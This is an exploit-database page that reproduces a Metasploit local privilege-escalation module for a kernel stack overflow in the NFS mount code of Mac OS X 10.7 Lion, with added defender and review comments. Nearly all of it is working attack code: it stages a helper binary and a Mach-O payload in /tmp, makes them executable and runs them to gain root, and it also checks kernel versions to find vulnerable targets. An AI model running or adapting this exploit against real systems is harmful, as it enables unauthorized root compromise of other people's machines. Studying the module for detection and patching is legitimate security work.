





Mac OS X 10.7 Lion x64 NFS Mount Privilege Escalation

CVE Category Price Severity
N/A CWE-269 N/A High
Author Risk Exploitation Type Date
Unknown High Local 2014-04-28
CPE
cpe:/o:apple:mac_os_x:10.7
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014040174

Below is a copy:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

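# Metasploit local module for the Mac OS X 10.7 (Lion) x64 NFS mount
# privilege-escalation issue (EDB 32813).
#
# Per the module description, the kernel function nfs_convert_old_nfs_args
# copies a user-provided argument to the stack without verifying its size.
# The description lists kernels <= xnu-1699.32.7, except xnu-1699.24.8, as
# affected.
#
# Defender notes, derived from the code below:
# * Two files are written on the target under /tmp, each named with 12 random
#   lowercase letters; both are made executable with `chmod +x`.
# * The first file (a prebuilt helper shipped with the framework) is executed
#   with the path of the second file (a Mach-O x64 payload) as its only
#   argument.
# * Both paths are registered for cleanup, so file-based evidence may not
#   persist after the session; process-execution and file-creation telemetry
#   for /tmp is the more dependable signal.
# * `check` relies solely on the xnu build string printed by `uname -a`.
class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Registers the module metadata (name, description, authors, references,
  # platform/architecture, session types and the single target).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X NFS Mount Privilege Escalation Exploit',
      'Description'   => %q{
        This exploit leverage a stack overflow vulnerability to escalate privileges.
        The vulnerable function nfs_convert_old_nfs_args does not verify the size
        of a user-provided argument before copying it to the stack. As a result by
        passing a large size, a local user can overwrite the stack with arbitrary
        content.

        Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Kenzley Alphonse', # discovery and a very well-written exploit
          'joev' # msf module
        ],
      'References'    =>
        [
          [ 'EDB', '32813' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => [ ARCH_X86_64 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.7 Lion x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86_64
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Apr 11 2014'
    ))
  end

  # Classifies the target by its xnu kernel build string.
  #
  # @return [Exploit::CheckCode::Vulnerable] build is below 1699.32.7 and is
  #   not the excepted build 1699.24.8
  # @return [Exploit::CheckCode::Safe] build is outside that range
  # @return [Exploit::CheckCode::Unknown] the build string could not be read
  #   or parsed
  def check
    raw = xnu_ver
    # xnu_ver yields nil when `uname -a` has no "xnu-" token and "" when the
    # token carries no digits. Neither identifies a build, so report Unknown
    # rather than raising on nil or treating "" as version 0.
    return Exploit::CheckCode::Unknown if raw.nil? || raw.strip.empty?

    # Drop the "~N" build suffix before the exception test. ver_lt already
    # ignores it, but a raw string compare against "1699.24.8" would never
    # match a value such as "1699.24.8~1", misreporting the excepted build.
    build = raw.strip.sub(/~.*\z/, '')

    # NOTE(review): the description says "<= xnu-1699.32.7" while this is a
    # strict less-than, so 1699.32.7 itself is reported Safe. Confirm which
    # bound is intended before relying on this result for exposure triage.
    if ver_lt(build, "1699.32.7") && build != "1699.24.8"
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  rescue ArgumentError
    # Gem::Version rejects malformed version strings; treat as undetermined.
    Exploit::CheckCode::Unknown
  end

  # Stages the prebuilt helper binary and the generated payload on the target
  # and runs the helper with the payload path as its argument.
  def exploit
    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
    helper_bin = File.read(file)
    pload      = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    # Both names are 12 random lowercase letters, so interpolating them into
    # the shell commands below cannot introduce shell metacharacters.
    tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

    print_status "Writing temp file... #{tmpfile}"
    write_file(tmpfile, helper_bin)
    register_file_for_cleanup(tmpfile)

    print_status "Writing payload file... #{payloadfile}"
    write_file(payloadfile, pload)
    register_file_for_cleanup(payloadfile)

    print_status "Executing payload..."
    cmd_exec("chmod +x #{tmpfile}")
    cmd_exec("chmod +x #{payloadfile}")
    cmd_exec("#{tmpfile} #{payloadfile}")
  end

  # Extracts the xnu kernel build from `uname -a` on the target.
  #
  # @return [String, nil] the text following "xnu-" (digits, dots and "~"),
  #   or nil when no "xnu-" token is present
  def xnu_ver
    m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)
    m && m[1]
  end

  # Compares two version strings after removing any "~..." suffix.
  #
  # @param a [String] left-hand version
  # @param b [String] right-hand version
  # @return [Boolean] true when a is strictly lower than b
  # @raise [ArgumentError] when Gem::Version cannot parse either string
  def ver_lt(a, b)
    Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,''))
  end

end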

